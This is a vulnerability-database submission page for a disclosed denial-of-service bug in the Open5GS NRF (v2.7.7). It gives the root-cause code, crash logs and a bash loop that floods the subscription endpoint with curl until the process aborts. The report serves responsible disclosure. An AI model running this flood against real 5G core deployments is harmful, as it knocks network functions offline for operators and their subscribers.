Submit #817029: Open5GS NRF v2.7.7 Denial of Serviceinfo

Titel	Open5GS NRF v2.7.7 Denial of Service
Beschreibung	### Open5GS Release, Revision, or Tag v2.7.7 ### Description NRF aborts when repeated valid `POST /nnrf-nfm/v1/subscriptions` requests exhaust the fixed `subscription_data_pool`. The server-side subscription creation path does: ```c subscription_data = ogs_sbi_subscription_data_add(); ``` and `ogs_sbi_subscription_data_add()` is implemented as: ```c ogs_pool_alloc(&subscription_data_pool, &subscription_data); ogs_assert(subscription_data); ``` So once the pool is full, NRF does not return a normal exhaustion error. It asserts and the whole process exits. Pool sizing comes from: ```c ogs_app()->pool.subscription = global_conf.max.peer * 16; ``` with the default: ```c #define MAX_NUM_OF_PEER 64 ``` which yields a fixed pool of 1024 subscription slots before accounting for already-present internal subscriptions in a live deployment. ### Root Cause - Entry route: `POST /nnrf-nfm/v1/subscriptions` - Exact crash site: `../lib/sbi/context.c:2758` - Root cause family: resource exhaustion leading to assertion abort - Controlling factor: number of created subscription objects ### Steps to Reproduce 1. Confirm a normal control request succeeds: ```bash curl --http2-prior-knowledge -sS -i -m 8 \ -X POST 'http://10.33.33.3/nnrf-nfm/v1/subscriptions' \ -H 'content-type: application/json' \ --data '{"nfStatusNotificationUri":"http://10.33.33.1:9999/cb","reqNfType":"AMF","subscrCond":{"nfType":"UDM"}}' ``` In my live run, the control response was: ```text HTTP/2 201 ``` 2. Flood NRF with valid unique subscription requests until the pool is exhausted: ```bash i=0 while [ $i -lt 1400 ]; do i=$((i+1)) payload=$(printf \ '{"nfStatusNotificationUri":"http://10.33.33.1:9999/cb/%d","reqNfType":"AMF","reqNfInstanceId":"flood-%d","subscrCond":{"nfType":"UDM"}}' \ "$i" "$i") curl --http2-prior-knowledge -sS -m 3 \ -X POST 'http://10.33.33.3/nnrf-nfm/v1/subscriptions' \ -H 'content-type: application/json' \ --data "$payload" >/dev/null \|\| break done echo "$i" ``` In my live run, the flood failed at request `1003`. 3. Inspect the crash: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}} {{.RestartCount}}' nrf docker logs --since 2026-04-11T11:47:46Z nrf ``` ### Logs ```shell Control response: HTTP/2 201 Flood result: fail_at=1003 sent=1003 Container state: exited 139 2026-04-11T11:48:07.90528137Z 0 NRF logs: 04/11 11:48:07.812: [nrf] INFO: [4ec87c20-359c-41f1-81d2-5fcf356115a1] Subscription created until 2026-04-12T11:48:07.812847+00:00 [duration:86400000000,validity:86400.000000] (../src/nrf/nnrf-handler.c:633) 04/11 11:48:07.817: [sbi] FATAL: ogs_sbi_subscription_data_add: Assertion `subscription_data' failed. (../lib/sbi/context.c:2758) ``` ### Expected behaviour NRF should reject excessive subscription creation with a normal HTTP error such as `429`, `503`, or `507`, and remain running. ### Observed Behaviour Repeated valid subscription requests exhaust the fixed pool and terminate the NRF process with exit code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle	⚠️ https://github.com/open5gs/open5gs/issues/4465
Benutzer	ZiyuLin (UID 93568)
Einreichung	01.05.2026 10:31 (vor 1 Monat)
Moderieren	16.05.2026 14:38 (15 days later)
Status	Akzeptiert
VulDB Eintrag	364331 [Open5GS bis 2.7.7 NRF /lib/sbi/context.c Denial of Service]
Punkte	20

◂ Zurück Übersicht Weiter ▸

Interested in the pricing of exploits?

See the underground prices here!